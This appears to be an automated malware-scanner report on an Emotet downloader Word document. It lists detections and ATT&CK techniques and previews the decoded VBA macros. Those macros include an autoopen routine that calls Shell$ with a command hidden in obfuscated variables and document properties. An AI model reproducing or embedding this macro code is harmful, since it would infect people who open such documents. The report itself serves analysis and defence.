MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6344335-3'. Static analysis revealed VBA macros, including an autoopen macro, that utilize a Shell() call. This call is highly indicative of executing a command, likely PowerShell, to download and execute a secondary payload. The presence of VBA macros and the execution of external commands are characteristic of Emotet's downloader functionality.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
On Error Resume Next VBA.Shell$ "" + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.CustomDocumentProperties("ZpEkWFg") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.BuiltInDocumentProperties("Comments") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPP … End Function -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() ukWWdsK -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3765 bytes |
SHA-256: 079b4afe971b2ee43151414f94c7deccbdb73af1d6d2a0461a6e8b927a909c56 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub FMGAn24cV()
On Error Resume Next
Select Case cFmIw
Case 8059
wUhL25 = 2636
GpzXy = Jlzd789p
UWiZ = 482
Case 6364
HfiuK0K8 = XiLc
shtE = Round(RQUnj832I + ChrB(tGjztO8))
huYs7195 = Int(252065587 * 127 * 204048515 + CLng(IBL))
Case 46
IKWt3M788 = Fix(cTuwVw8 * CByte(BLux6x4G / Tan(29285969)) * 709 * zDNle7)
YwAYF = odu
CZk = CStr(278725002)
End Select
Set xjQY96L = 3
End Sub
Sub vgYJ(kHiis167)
On Error Resume Next
Dim jfjyp146z()
ReDim jfjyp146z(2)
jfjyp146z(0) = 441
jfjyp146z(1) = 14
yYzpN2 = (GMOz7Gjx / CDate(XIsh) * XKEimT1 + 7391 * (9 - CStr(15 * CStr(1)) * 204179029 / Round(SIi)))
sVS = tRTKlgHp - 147619628
End Sub
Sub autoopen()
ukWWdsK
End Sub
Sub FHjEj(LAcQVZ87)
On Error Resume Next
Do
Dim lJeuDE96, nqrjpo6
neGow086 = 4163
AkQCgA = 294325181 - 51502176
Loop Until bwvS69z8z >= 13
Do While JKyP8pxto Eqv 10
For Each ZJyu In NBZq5Y
oYwx = UlaI61M1 / fph * 498373131 / vrGbz * (86 * CDate(4003) * (93 + Int(Lyrs) / 28188549 - ChrW(hlpn60H)))
Next
Set vRSb9W = 3
Select Case tJBR
Case 407850943
jaum6Cn = ChrB(3641 * Hex(EzHUi2E))
NCskA = CjuvT
rSZ = CBool(Act)
Case 1
crvr = 368
xgQY = ocXUh23
QXvYq42qV = xzak9Z2
Case 513122720
vLZp = ChrB(233198461)
eObu66H03 = 8
vxQ = 385391781
End Select
Set ZWbLW1X89 = DzyG
Loop
End Sub
Sub sSYfU0(SpsW4rP)
On Error Resume Next
XtaW = 252633654 - Rnd(JHd / Chr(RzwyI3)) * 582 - CSng(67 / 61 + UuzY46cs5 - CStr(404047675)) / 67 * RJpk5xi38 / 271545299 + CStr(77 + CByte(13 - Atn(64 - mTgJ * 284735532 / 32)) - 43 - CLng(ZdgH93I))
YSuN0x5D = 229040495 / 36292429
zFcxbS = (8 / CStr(UEi) + (ZRhr + jKDn0 - 14 / GDs * (EYA * CSng(345020765 * bQZ) - SsI / Cos(uAwx3Vije))))
End Sub
Public Function ukWWdsK()
On Error Resume Next
VBA.Shell$ "" + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.CustomDocumentProperties("ZpEkWFg") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.BuiltInDocumentProperties("Comments") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ZzNNgAY, 0
End Function
Sub JMQObR0()
On Error Resume Next
Lphmp5 = MDxY8q2 * uvPIG51Hm
Uvcq = 314659417 * 465999738
End Sub
Sub wXFp7reR9()
On Error Resume Next
Do While kcJf > lkPIt4
For Each GIyl In OvCk
PLPbA5 = Cos(188802468)
Next
For Each MqSKJ6f In ORvWe4F5
noUx84A = 598
Next
For qiUPL4Ycs = cinf02 To DJpsd633
FcHCQ5Ol = 531668891 * Chr(tWAv7fc2 / 401 - oOnx * Hex(22 + Log(238889098))) * yqAGY + Atn(URVKDhE26) * 933 / Fix(OUEk5 * Sin(193) - 9312 - Round(gXeSX11e)) * 699 - Round(lEol06) + 1648 - Round(299506984)
Next
Do
cgXl1L = PVFdrkie * Int(7) * ZPWvW0 / Cos(6789) - 9 + Tnbf086
Loop Until xbKi8920 > 6
EFRQ1 = 334953148 * wLRi7
Loop
RSFC2F12 = mcgVq3X - 251107387
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.